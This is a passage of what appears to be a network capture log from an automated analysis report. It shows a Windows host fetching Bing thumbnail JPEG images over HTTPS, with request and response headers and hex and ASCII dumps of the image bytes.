ff c4 00 b5 11 00 02 01 02 04 04 03 04 07 05 04 04 00 01 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 Data Ascii: }!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzw!1AQaq"2
2024-12-16 10:25:07 UTC	7230	IN	Data Raw: 61 36 f3 56 73 18 5e 5a 80 45 55 57 65 c1 fe 1f e1 5a 73 3e d5 fb 95 69 1a 3d b4 dc 46 ca df de a0 ab 74 45 46 93 b8 ff 00 c7 a9 d1 ca 3b f4 a7 b2 2a ff 00 1f 3c d2 46 23 fe 2f e1 a0 9d 49 57 e6 6e 7a ad 3e 34 01 79 eb 4c fb ab c5 27 9c a3 e4 fb d5 3a b2 94 87 32 02 dc f4 6a 58 40 2b cf 55 a4 91 81 5f 7a 14 83 f4 a3 51 36 3e 38 fe 6c 0e 94 ef 6a 89 a4 45 6e 29 56 40 57 71 a5 ca ca 4c 91 5b 0b c5 37 76 38 ee d4 c7 3b be ef 4f f6 69 9e 61 6d b8 a7 ca 0e 56 1d 33 b2 aa e3 fe 03 4a a4 b7 27 e5 2a df 76 a2 60 4f d6 91 a4 60 cd 8a 7c a8 86 c9 fa 2f 35 22 15 5a af e6 fa d1 e6 38 eb f2 8a 5c ac ae 65 72 c6 f0 77 50 cc 43 7c 9f 37 fe 83 55 9a 6d bc d4 89 30 2a b8 5a 39 41 49 34 48 92 36 ee 7f 89 aa 56 98 fc ab bb ff 00 b1 aa de 6a 6d a3 72 75 a9 e5 0b a5 b3 2c b3 Data Ascii: a6Vs^ZEUWeZs>i=FtEF;<F#/IWnz>4yL':2jX@+U_zQ6>8ljEn)V@WqL[7v8;OiamV3J'v`O`\|/5"Z8\erwPC\|7Um0*Z9AI4H6Vjmru,
2024-12-16 10:25:07 UTC	8192	IN	Data Raw: 2a 86 0d cf cb 4f 6f 65 e3 9a 5d bf 78 9f e2 5a 00 89 47 7e fd 68 db 95 de 7f 89 aa 45 5f 9b 9f e2 a4 f2 fd 3a 50 2d 58 dd bf 2b 63 ff 00 41 a4 52 3e 53 b6 9e a8 77 54 8d 19 eb ff 00 8f 50 52 d8 66 36 c3 92 bf ee d2 2b 7d e2 17 86 ff 00 c7 69 df c5 83 f3 7f b5 48 57 0d c7 4a 94 82 4d 92 29 5f 9b 2a b8 ff 00 66 95 80 1b be 5d d5 18 c8 e9 b5 4d 2c 8e 4e e2 7e 5a 39 47 7b a1 77 26 d6 ff 00 66 9b e5 17 5d c1 b6 8a 1b ee af fb b4 2b 77 a3 94 9e 61 76 98 ff 00 de 5a 6e 09 6e 5a 9c 9c b6 4a af ff 00 15 48 aa 4b 6c ff 00 be 68 28 76 d7 5f fe 2b e9 48 b1 b9 5c ff 00 f6 34 fc 91 ff 00 b2 d3 a2 1b 97 ef 6d a9 e8 16 57 23 f2 dc 32 d0 f9 dd 83 56 16 35 3f 26 ed bb a9 fe 46 3f da a5 71 d8 ac b9 2a c6 9e a8 43 65 aa 7f b3 bf 5f fd 06 95 e1 3b b1 da a6 e8 7c a4 4c c7 e5 Data Ascii: Ooe]xZG~hE_:P-X+cAR>SwTPRf6+}iHWJM)_f]M,N~Z9G{w&f]+wavZnnZJHKlh(v_+H\4mW#2V5?&F?q*Ce_;\|L
2024-12-16 10:25:07 UTC	8192	IN	Data Raw: 0a 97 67 fd f5 4b e5 e1 78 a3 40 d0 81 54 1e 05 23 c2 4f 0c d5 3b 2f cb 9e f4 9e 51 66 f9 a8 bd 84 ca ed 18 db f7 e9 15 32 b9 1f 35 4e 63 c5 39 63 50 dc 7f 13 53 e6 15 8a 81 50 73 b7 ef 52 a8 ef b6 a7 9a 2c b2 e1 78 a5 58 bf d8 a7 cc 2b 6a 40 cd eb d3 f8 69 18 e3 8f bd 56 1a 2c f5 fe 2a 62 c2 3f dd 2b 47 32 1b ba 23 4f 7e bf ec d0 4f f7 2a 6f 28 8e 07 f7 a9 be 53 b3 36 28 ba b8 86 6e 0b fe f3 52 06 26 4a 99 62 ec 7e 66 a4 58 bb 6e a1 d8 7a d8 62 7b b6 ea 10 9d d8 76 dc 1a a5 58 7e e9 1f 2d 3c 46 3a 1e bf dd a9 06 84 57 c3 7b 7f 76 94 4a 43 63 6f 15 27 92 0f fb 34 2c 19 dd 8f e1 a9 d0 ad 44 cf ff 00 b5 45 3d e2 5e aa bc ff 00 76 8a 5a 15 a8 f2 83 6a 80 bc 2d 22 a7 cb 56 9a 10 17 fb df fa 15 36 44 2a dc a7 de fe 1a 5c c8 ae 52 ba a0 a4 68 c6 ec 85 ab 1b 00 Data Ascii: gKx@T#O;/Qf25Nc9cPSPsR,xX+j@iV,b?+G2#O~Oo(S6(nR&Jb~fXnzb{vX~-<F:W{vJCco'4,DE=^vZj-"V6D*\Rh
2024-12-16 10:25:07 UTC	8192	IN	Data Raw: 11 b0 1b f8 a8 e7 6d 2b 0c 71 b6 93 19 e9 40 b7 11 41 ff 00 66 85 1d 8d 3b 9e 82 93 a5 00 dd 84 c1 f9 7f d9 a5 51 eb 4a c2 86 1e b4 0d 6c 37 69 2b cd 0c 31 d2 86 38 a3 1f f7 d5 04 b6 80 8c ff 00 05 36 45 1b a9 ca 33 f4 a5 c6 57 07 a5 01 6b 8c 55 f9 69 58 7e 54 f6 00 b5 37 3f 37 14 6e 3b 8d c1 34 dc e5 78 e9 52 63 75 04 63 a7 ca 29 a0 b0 cf bd cf dd a6 ae 77 2d 48 bc 2d 0a 33 c7 de a6 2b 5c 67 dd 6e 69 5b 1b b7 6d a5 f9 7a 50 c3 fb ab 40 3d 04 6c 52 20 cf 06 95 54 f4 a1 42 7c b8 6d d4 0a e2 30 a5 61 9f f6 69 d9 cf 1d e9 1a 80 d4 66 7f 35 a7 46 3e 5f 6e 94 aa 3e 5a 17 8f 96 81 2d c6 20 60 de d4 53 d8 8a 28 d4 a6 5c 51 f3 52 e3 0b 46 69 6b 13 41 36 e2 8c 67 ad 1c d0 c6 81 b1 38 e8 3f 86 80 a0 51 8e d4 67 de 81 73 68 2e d0 39 a1 85 0d f3 52 7f 0d 01 d0 36 f6 Data Ascii: m+q@Af;QJl7i+186E3WkUiX~T7?7n;4xRcuc)w-H-3+\gni[mzP@=lR TB\|m0aif5F>_n>Z- `S(\QRFikA6g8?Qgsh.9R6
2024-12-16 10:25:07 UTC	8192	IN	Data Raw: e9 ca 6a 47 b9 20 6a 18 fc d4 c5 6f 96 9d ba a4 a5 2b 0f 5c 16 c7 6a 96 30 b5 5f 7e 1a 9d bb e6 a9 6a e5 c6 4a e5 86 c5 27 bd 43 e6 1d bc 51 e6 7e 74 94 59 7c c8 97 3f 35 19 cf cd 50 b3 f6 a4 df 4f 95 8b 9d 13 33 62 9a cc 0f 5a 89 9b f8 a9 bb e8 51 25 ca ec 97 7e 29 1a 4f 97 ef 54 5b fb 53 59 be 6a be 53 37 52 c4 be 67 7a 6f 98 7b d3 18 d2 64 d3 e5 0e 67 61 fb cd 35 98 9a 6b 66 86 f6 e9 4e c8 9e 77 61 5c 9f f7 69 18 91 ce ea 6e 71 49 9c 7c b5 56 23 9d 8e dd 49 93 fe d6 68 53 8f f6 69 73 9e b4 82 fa 06 4f 76 a3 26 86 27 bd 0b cf 22 81 8b bb bd 0a 3d 05 2f 06 85 c5 03 57 0c 9d bc d1 93 b7 de 97 68 34 ed a2 95 ca 6a e3 32 68 cb f7 a9 15 40 6a 46 1f ec d1 70 77 19 9c ff 00 c0 68 dc 69 ca b9 a1 53 e6 a2 e8 6a e1 9f f8 15 0d cd 2e dc 7f 17 14 8c a4 74 a5 a0 ba Data Ascii: jG jo+\j0_~jJ'CQ~tY\|?5PO3bZQ%~)OT[SYjS7Rgzo{dga5kfNwa\inqI\|V#IhSisOv&'"=/Wh4j2h@jFpwhiSj.t
2024-12-16 10:25:07 UTC	8192	IN	Data Raw: bb 58 75 5e 28 ba 24 75 bc 6a 63 6d ed b4 ff 00 e8 54 52 46 99 5a 2b 36 f5 dc da 2e cb 63 4f 92 b4 00 68 f3 30 b8 0b cd 23 3e 1b 15 cf a9 a7 35 d8 fc 7e 54 d7 c8 a4 de 0d 31 e4 53 45 98 db 1d 83 4b 8c ee f9 b8 a6 29 dd b4 f7 a9 00 a0 4b 51 11 71 c5 21 14 a5 c0 5c 9e b4 c4 66 1c d0 93 60 ec 1b 4f 7a 10 e5 b8 5a 5f 30 1f a5 2a 60 b7 de e2 9e a2 b0 48 70 b9 a3 23 6e e3 43 0f bc 7b 54 72 63 e5 3d e9 0f 61 e3 2f fe cd 35 14 86 fe f5 33 7a 9e 29 43 6d 5f 7a ae 56 4d ee 4d 8c e1 fb d3 95 be f5 44 b2 65 b9 a6 a4 c0 b7 b7 f7 a9 58 2e 89 db 1d 7f bb 40 fb b9 3d 2a 3f 31 68 59 71 fe d5 16 65 5c 7e 33 cf 6a 47 00 51 1b 86 6e 3a d3 f8 3d 76 d2 01 ac bf 7b 14 d0 b9 6e 53 9a 71 20 b7 de e2 91 9d 47 4e b4 04 87 28 23 77 a5 0c bf 78 ff 00 13 53 15 fe 55 27 f8 bf bb 4e de Data Ascii: Xu^($ujcmTRFZ+6.cOh0#>5~T1SEK)KQq!\f`OzZ_0`Hp#nC{Trc=a/53z)Cm_zVMMDeX.@=?1hYqe\~3jGQn:=v{nSq GN(#wxSU'N
2024-12-16 10:25:07 UTC	8192	IN	Data Raw: 4d dd 08 91 bc ad b4 b1 94 0b 4c 6e 1b 34 67 0d 9f bb 4a e5 6c 3b 64 65 b3 9a 52 42 fd ea 63 35 1d 76 93 4f 51 68 c7 65 5b f8 78 a7 6e 8f a6 ea 67 f2 a5 8c 7c df ed 2d 22 ad 16 2a 90 59 4f 7a 57 d8 57 9d d4 d6 e3 ee ff 00 15 2d 3b 8b ad d0 e4 09 fd e6 a5 6c 1f a5 31 0f 7a 76 41 ff 00 66 a4 12 4c 5c 0a 36 ae e6 1f f7 d5 27 46 fb d4 aa 7e 5a 06 a2 86 e4 2f f1 6e a5 52 0f fc 0a 9c be d4 67 e6 ff 00 76 9d c3 44 20 5f 9b ef 6e a2 44 1f f7 d5 2f 56 e5 a9 5b 3b b1 f2 d2 05 14 c5 ce da 5c e2 93 18 5a 4d d8 e7 6d 05 5a c2 ed 14 aa 30 b8 34 99 cf 34 ac 17 f1 a4 c5 b8 aa 3d 29 ac 87 cc cd 2a 80 3a d2 75 6e 7a 51 76 26 90 9b 06 ec 53 98 50 3f 4a 5c 8e 94 ee 35 17 61 bf 38 6e 29 54 67 71 3d 69 70 3a f6 a5 ce ee 76 54 f3 07 2a 11 b3 4d d8 f4 ef 96 84 07 76 0d 3b 87 2d Data Ascii: MLn4gJl;deRBc5vOQhe[xng\|-"YOzWW-;l1zvAfL\6'F~Z/nRgvD _nD/V[;\ZMmZ044=):unzQv&SP?J\5a8n)Tgq=ip:vT*Mv;-
2024-12-16 10:25:07 UTC	8192	IN	Data Raw: e0 21 49 2a d5 37 31 bc 75 e3 ad 37 4f 8e e7 4a d1 d6 3f 36 25 23 6c 5f 75 71 ea 07 ad 79 5e bf e3 d9 6e e6 8a d2 e5 67 91 6d 97 1e 52 fc a9 cf d2 b4 b5 af 0d 5b 96 9e e6 cb 57 68 ae 17 9f 3f ef 75 eb c7 7a e7 e7 f0 ff 00 93 70 c4 dc c1 b5 b9 69 3e eb 49 f8 76 cd 7c ed 3f 63 35 73 ae a5 6a 92 7c ad 68 49 a7 eb 57 b3 db c9 14 5f bb 69 1b 2b e5 b6 36 fb 56 97 fc 24 da 9c 70 fd 8f f7 7e 6c 52 47 b5 77 61 d8 77 cd 51 d2 4e 9f 6e cc 44 1f e9 0a d8 56 5f bb c7 a7 6a e7 fc 48 f2 58 78 82 2f 21 65 68 e5 fb b2 49 fc 47 eb de b9 eb c6 94 ef 0b 6c 73 56 72 d8 f4 8b 6f 16 c5 b9 7f d5 ac 92 37 ef 23 8f ee e6 ad 5f ea 16 97 71 c9 79 6f 2a b4 ab 1e 1b e6 f9 97 15 e6 49 73 04 4b 1c e3 e6 66 90 7c df de 27 fa d6 b5 85 fc 50 c7 3c 69 bb 73 7d d5 65 fb d9 3d ab c6 e6 85 37 Data Ascii: !I71u7OJ?6%#l_uqy^ngmR[Wh?uzpi>Iv\|?c5sj\|hIW_i+6V$p~lRGwawQNnDV_jHXx/!ehIGlsVro7#_qyoIsKf\|'P<is}e=7

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49764	150.171.28.10	443

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:25:07 UTC	346	OUT	GET /th?id=OADD2.10239360265014_1I9L6MC65FHDFQ9Z7&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-12-16 10:25:07 UTC	856	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 195935 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: F2E41038E77F444B9F89154D9C9E9C84 Ref B: EWR311000108019 Ref C: 2024-12-16T10:25:07Z Date: Mon, 16 Dec 2024 10:25:06 GMT Connection: close
2024-12-16 10:25:07 UTC	15528	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 00 da 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 00 00 00 00 60 00 00 00 01 00 00 00 60 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 34 2e 31 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 30 32 3a 31 30 20 32 32 3a 34 31 3a 35 38 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 03 00 00 00 01 04 38 00 00 a0 03 00 03 00 00 00 01 07 80 00 00 00 00 00 00 00 00 ff db 00 43 00 04 02 03 03 03 02 04 03 03 03 Data Ascii: JFIFHHExifMM*bj(1r2i``Adobe Photoshop 24.1 (Windows)2023:02:10 22:41:588C
2024-12-16 10:25:07 UTC	16384	IN	Data Raw: 13 1d ff 00 a5 18 a0 fd 28 5e ff 00 5a 00 4a 4c 71 fc a9 d8 27 bf d2 91 85 34 02 2f dd a5 c7 b5 2e 09 e9 f8 d2 ff 00 9e 94 c2 e1 da 93 18 e4 52 fb d1 c5 48 0d c7 b7 6a 5c 67 ad 2f e3 40 14 05 c4 c7 7a 3e b4 e0 3d a9 17 39 a0 42 11 fe 4f 6a 4a 7f 56 a0 8f fe b5 3b 85 c6 af f3 eb 4b 4b 8f 9b a5 18 e9 48 04 fa d1 8c 0c e0 d3 b1 ff 00 ea a2 81 0c c5 18 a7 63 ff 00 af 40 fa 1f c2 a8 2e 26 28 e8 78 34 e0 39 cf ad 1d 29 00 98 e6 93 b6 69 df 9d 07 d3 f2 cd 30 0c 76 cf e5 45 2d 2e 29 58 57 1b 46 3f c8 a7 52 62 8b 05 c3 19 ed 48 b8 e6 9d 49 8c 50 01 ef 43 52 e3 8c 51 cd 02 0c 7f fa e8 a0 f5 a2 98 19 f4 63 22 97 8a 2b 23 ae e2 63 fc e6 8c 53 a8 c7 b5 31 5c 6e 3f fa f4 b4 a4 7d 28 ed 40 0d c7 ff 00 5a 97 02 97 1e d4 7d 28 01 05 2f e1 47 1e 94 77 a0 03 f0 a4 ef fe 34 Data Ascii: (^ZJLq'4/.RHj\g/@z>=9BOjJV;KKHc@.&(x49)i0vE-.)XWF?RbHIPCRQc"+#cS1\n?}(@Z}(/Gw4
2024-12-16 10:25:07 UTC	16384	IN	Data Raw: 3d ba 18 5a 74 75 5b f7 25 92 ee 46 62 c6 47 91 9c f2 59 89 62 7d 49 3c 9a 8e 49 65 3d 4f e1 9a d8 d1 ec 6d 61 91 6e 2f 23 69 a3 0d f3 a2 36 30 31 eb f5 c5 53 d4 56 0f b4 b1 b7 50 a9 9e 3e 95 8c 5a 6e c8 eb 94 6c 94 99 4d 4b fa 1f 70 2b 53 45 b6 37 4a b1 ae ef 30 c8 3e 6c fc a0 7d 3f ad 51 58 fd 5b bf a5 69 e9 97 3f 63 5d e8 48 63 8e 7e 9d bf 41 4e a2 7c ba 0a 9c e2 a6 af b1 d2 5b e8 d1 41 0f da f1 b2 de 36 5f 3d d9 b0 5f 9f 99 40 ce 78 a8 35 4f 14 0b 1b b9 a2 d1 91 15 59 be f2 e4 0c e3 07 fd e0 7a 8c f2 0f 22 b1 af b5 2b 9b ab 76 8d a4 0b 18 25 82 8e 32 4f 53 fa d2 68 ba 36 ad ab 43 24 da 66 91 7b 7b 1c 27 f7 8f 6f 01 61 f9 8e fc 57 2a a2 be 2a ac ed 96 32 4e d0 c3 44 4b 8b fb fd 49 63 86 f6 ea 4b 81 09 26 31 21 ce dc f5 fc 78 ad fd 1e fe 6b 7b 55 82 17 Data Ascii: =Ztu[%FbGYb}I<Ie=Oman/#i601SVP>ZnlMKp+SE7J0>l}?QX[i?c]Hc~AN\|[A6_=_@x5OYz"+v%2OSh6C$f{{'oaW**2NDKIcK&1!xk{U
2024-12-16 10:25:07 UTC	16384	IN	Data Raw: ff 00 57 4a 72 a8 03 21 86 e5 ea 3d 68 b8 87 5b a6 e6 0b 9d a7 39 06 b4 6c dd 62 91 46 46 dc f5 3d 85 50 87 06 65 c9 3b 73 c9 f4 15 36 dd a7 2a df 74 f0 7d 6a 25 a9 74 e5 ca d3 35 9e 58 de 05 3f 7b 23 a8 ec 68 b5 c9 75 d8 5b 6b 77 3e 95 53 4e f2 ce f0 58 e0 f4 07 b1 ab 31 a3 26 d0 0f 00 f1 93 d2 b9 a4 ad 74 7a b4 ea b9 59 b3 5a c6 71 fc 64 6d 07 bd 6b 5b 4b 85 c6 ff 00 9f b0 c7 5f ad 60 59 80 ca 33 d5 4f 3e 86 af 5b ce dc 0c 8f 63 8e 95 cd 38 ea 7a 14 ea d9 1d 2e 93 78 63 b8 50 02 ed 6e 00 1d ab 7a d6 7f 2c 12 a7 71 24 64 9a e3 74 f9 48 70 e3 ef 2f 4c 7d 6b 6a 0b ae aa 72 d9 e9 cf 5a e4 ab 4e e7 6d 1a da 1d 43 5c 2b ae e4 f4 ee 6a 6b 5b 82 8e 4a be 79 eb d3 f3 fc ab 9c b7 99 bc bc ff 00 77 a0 07 9a 9d 27 62 c4 e3 ef 0f 5a e4 95 3e 87 7c 2a 5f 53 a4 7d 50 Data Ascii: WJr!=h[9lbFF=Pe;s6t}j%t5X?{#hu[kw>SNX1&tzYZqdmk[K_`Y3O>[c8z.xcPnz,q$dtHp/L}kjrZNmC\+jk[Jyw'bZ>\|_S}P
2024-12-16 10:25:07 UTC	16384	IN	Data Raw: 3d 69 aa 4e ec f3 fe 34 bd 3f ad 04 8a 1b d2 85 f5 c5 27 4e df 95 19 cf 34 d0 87 03 f5 f6 c5 38 49 81 c0 e8 38 04 54 79 39 cd 26 79 f4 a4 16 27 57 20 e4 1c 71 ce 69 f1 3b 29 38 fe 2f 51 55 f2 7b 82 7d f3 53 41 ce 09 23 f1 34 3d 83 5e 85 eb 59 08 90 06 3b 82 9e 4e 3f 9d 68 5b 10 72 ab 91 83 91 9e 95 8e ae 17 04 03 ed 57 d6 72 b1 ee 89 c9 1b ba e7 f2 cd 63 28 b6 77 52 a9 18 dd be 86 fc 32 c6 8c 77 a8 1b 80 e1 86 40 fc 6b 4e c7 53 7b 7d a0 da db de 79 7c 18 ee 01 10 cb 19 1f 71 f6 15 2d 83 82 32 7b 57 3f a3 df c5 f7 66 b3 69 99 48 d9 2b 4b b5 63 f5 05 71 87 07 23 af 4c 54 ad 33 b4 80 82 14 a9 c6 54 f6 f4 c5 72 4e 9d dd 9a 3d 4a 55 ae 94 a2 cb cd 77 39 87 cb 49 c2 ae ee 21 07 ee 9f 5f e7 4c 8d d4 f5 62 0f 6c 8e 95 59 24 27 8c 2e 7d 8f 4f 6a 7a b1 db 8c 67 d3 Data Ascii: =iN4?'N48I8Ty9&y'W qi;)8/QU{}SA#4=^Y;N?h[rWrc(wR2w@kNS{}y\|q-2{W?fiH+Kcq#LT3TrN=JUw9I!_LblY$'.}Ojzg
2024-12-16 10:25:07 UTC	16384	IN	Data Raw: b6 e7 3e fd f1 9a b1 64 f2 37 fa 2c 51 c3 24 80 33 b2 ca 46 1b 6f 27 6f e0 0f 1e a2 bc e7 4f bd 78 64 66 cb 2e e1 ca 81 d7 df 15 a1 a7 df 31 b8 59 14 6e da 49 08 7d ba f1 5c b2 c3 db 63 d4 a5 8f 52 4b 9b 73 b2 d5 ae bc 39 75 14 8d 05 93 42 1a d0 ed 66 94 c8 c9 2f 50 41 e3 2b d4 60 f2 01 ac fb 5b 6b db 8d 3c dd 26 d5 86 d0 6c 12 32 ed 05 82 ee d9 93 d4 91 9f 97 af 3c 55 5d 36 f2 49 e1 9e dd 15 7c bb 93 95 cf 18 65 e7 83 db 3d c5 5f 5f 36 5d 1e 6b 3b 8b 63 79 b5 a3 9c b3 47 26 e8 95 0e 58 32 af 3c 83 b7 76 32 3b 1a ce ce 3a 1d 3c ca a3 bf 42 b6 ad 1e a1 6d a7 24 f7 71 79 31 cc a1 ed c6 7f d6 21 e4 30 1d 40 fa d6 35 be b3 7f 60 ce b1 3a 95 98 8e aa 32 84 36 e0 41 ec 41 c7 35 d5 78 b3 46 7b 5b f3 aa 68 d6 72 7f 64 cb 68 97 56 c9 15 d8 bb 6b 78 64 52 c1 24 61 Data Ascii: >d7,Q$3Fo'oOxdf.1YnI}\cRKs9uBf/PA+`[k<&l2<U]6I\|e=__6]k;cyG&X2<v2;:<Bm$qy1!0@5`:26AA5xF{[hrdhVkxdR$a
2024-12-16 10:25:07 UTC	16384	IN	Data Raw: c7 1d 39 c1 c5 67 fd a1 0e c6 8f 26 9a 7b e8 7c f5 06 89 ac c9 f7 6c 25 e9 dc 62 ad 47 e1 8d 70 ae e1 68 70 0f 27 3c 57 ad 5f 58 4d 0b 1f b1 88 49 ed fb b6 ce 2b 17 52 ff 00 84 90 2b f9 69 12 a9 1c 70 46 7f 03 5a ac 4c a5 b2 39 6a 61 29 53 f8 ae fd 11 c0 b7 87 35 64 5f 9e 20 33 d8 8e 95 4a e3 4a bb 85 b1 20 50 7f de ae 96 fd 35 49 9b f7 d7 41 8e 7a 16 db 54 65 d3 e7 3f eb 6e 20 ce 3a 19 07 35 b4 67 27 b9 e5 d5 ab 08 e9 08 b5 ea 73 ff 00 66 94 75 23 f3 a1 23 71 d7 1d 2b 6d 74 b6 66 da 2e 2d f2 0f f7 ea ec 1e 19 9e 5e 52 f2 d4 e3 b0 6e 69 b9 a5 b9 9c 25 39 ec 8e 6d 43 1e ff 00 fd 6a 70 cf 7a ea 63 f0 6e a3 23 12 b2 46 4e 7d 2a cf fc 2b ed 6c c7 c2 c3 db 19 6e 45 4f b5 82 dd 9a 47 0f 5a 5b 41 9c 7e 58 0c 7a 8e 6a 48 49 18 27 3c 9e 3d 6b 72 f3 c1 fa dd ab 6d Data Ascii: 9g&{\|l%bGphp'<W_XMI+R+ipFZL9ja)S5d_ 3JJ P5IAzTe?n :5g'sfu##q+mtf.-^Rni%9mCjpzcn#FN}*+lnEOGZ[A~XzjHI'<=krm
2024-12-16 10:25:08 UTC	16069	IN	Data Raw: 33 c9 d7 27 ad 22 e0 fa ff 00 8d 4a ab 8f f1 a2 c4 68 ba 04 25 fa 1f 5e 99 a9 55 4e 71 ef d6 8c fa 8a 91 73 c7 f3 aa e5 32 94 89 23 46 ef 4f 08 41 cf a5 24 67 8e b5 32 10 7d fd 79 aa e5 b9 cf 26 c6 8f f6 aa 58 d1 18 7b 77 a6 4a a0 2f cb 50 ab e3 ff 00 af 48 8b 73 2d 0b 2c 89 51 c8 12 a2 69 18 f3 9e dd a9 ac ec 78 c8 a0 a8 c1 f7 1d 26 3f c6 99 f2 fa fd 29 a5 bb e6 93 39 ef f5 a4 68 a2 4c a5 47 4a 96 39 54 75 03 8a a5 bb d6 9d bb df f3 a7 70 74 ee 68 2d c4 67 f8 4d 45 74 14 f4 aa 9b f9 ea 7e 86 a4 8e 5c e0 13 9e 68 bd c8 f6 5c ae e8 8e 45 f4 fd 69 aa d8 6f eb 53 c8 99 e7 da a2 65 3d 39 fa 54 9a c6 57 43 6e 17 72 e7 f3 ac 99 cb 09 3d 3f 0a d8 cf cb 86 f4 ac fd 46 03 f7 d7 a6 79 ac aa 2e a7 45 09 24 ec ca e2 5e 29 92 c9 ff 00 ea cd 44 49 1f fd 7a 8d ce 2b 2b Data Ascii: 3'"Jh%^UNqs2#FOA$g2}y&X{wJ/PHs-,Qix&?)9hLGJ9Tupth-gMEt~\h\EioSe=9TWCnr=?Fy.E$^)DIz++
2024-12-16 10:25:08 UTC	16384	IN	Data Raw: 9e fc 62 8d 0c a3 cc b7 1f b2 36 5c 01 cf 73 50 48 bb 5b 1d bd ea 78 1b ff 00 ac 68 99 00 e7 b9 ea 4d 26 54 65 67 62 1c 9c 75 a7 c6 bd 32 7f 0a 58 b1 9e 7f 2f 4a 79 2b db 1f 5c 50 12 7d 05 18 dd ef 9a 7e 47 a5 45 c7 6f d4 53 b3 8e fd fa 50 66 d0 e6 3c d1 9c d3 73 f2 f4 fd 69 0b 7b f6 a1 05 89 a3 27 1c d2 9f 6a ac b3 32 b7 4e 33 d6 ac a3 06 f9 86 29 ee 4c a2 d0 ee 47 e5 c5 23 1a 18 ff 00 9f 5a 89 db 2d 81 4c 94 ae 49 f8 d3 d5 b8 e0 54 5d 06 3f 4a 50 78 c0 3f 4a 01 a2 55 3c f3 43 39 5e 07 ff 00 aa 98 0f 3d e9 25 3e 94 74 27 97 51 db fe b4 07 15 0e e2 5b 83 f8 51 b8 8a 2e 5f 29 63 78 1f d4 52 ab 1e e6 a0 8d 87 7f ca 9e ad 93 f4 a0 87 12 ca 3f 1d 69 e8 e0 8c 55 65 39 f5 fc 2a 58 71 ff 00 d6 cd 3b 99 4a 25 fb 71 9e 4f a5 36 f3 09 ce 6a 0f b4 6c 5e 4e 17 35 8d Data Ascii: b6\sPH[xhM&Tegbu2X/Jy+\P}~GEoSPf<si{'j2N3)LG#Z-LIT]?JPx?JU<C9^=%>t'Q[Q._)cxR?iUe9*Xq;J%qO6jl^N5
2024-12-16 10:25:08 UTC	16384	IN	Data Raw: 49 12 c6 c0 74 34 8d 72 c1 b0 33 f5 aa ec 4f f8 52 0c 9e 4d 17 64 7b 35 d4 b0 d7 6f 9e fd 29 63 b9 90 36 46 6a be d3 9e 95 22 ad 3b b0 71 8d b6 2d 2d db f7 fd 29 eb 73 9f bd eb de a9 b3 84 5f f0 a8 b7 3b 75 3f 95 17 23 d8 c5 f4 35 d6 74 3d 0d 48 bb 4a f0 df 95 63 23 9e 99 ab 30 4b 8c 53 32 9d 1b 6c 6a 46 01 e3 35 32 ae 3d 3f 2a a3 6f 70 15 b9 3f ad 5d 8e 45 7e 84 53 38 ea 46 48 76 00 ed 4c 90 0c ff 00 f5 ba d3 db db f5 a6 48 41 e2 99 11 23 62 3a 63 e9 4d da 07 5f e5 4b 8e f4 8d c7 f8 54 9a 0e c0 ed 48 dc d0 33 8a 46 fb dd 2a 80 76 28 e9 48 c7 0b 91 49 b8 15 a0 07 e7 3d a9 57 1d 69 9b bd e9 3c ca 02 c4 c9 4c 90 0c fb 52 06 cf 7f ad 24 92 05 1c ff 00 3a 62 49 dc 1a a3 c7 7a 82 ea ed 57 81 cf 3e b5 5d ef 19 ba 52 d0 de 34 66 cb ac 17 8f 43 51 49 8c f2 47 5a Data Ascii: It4r3ORMd{5o)c6Fj";q--)s_;u?#5t=HJc#0KS2ljF52=?op?]E~S8FHvLHA#b:cM_KTH3Fv(HI=Wi<LR$:bIzW>]R4fCQIGZ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49765	150.171.28.10	443

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:25:07 UTC	375	OUT	GET /th?id=OADD2.10239391107108_1TZ58OTQM3R24HW58&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
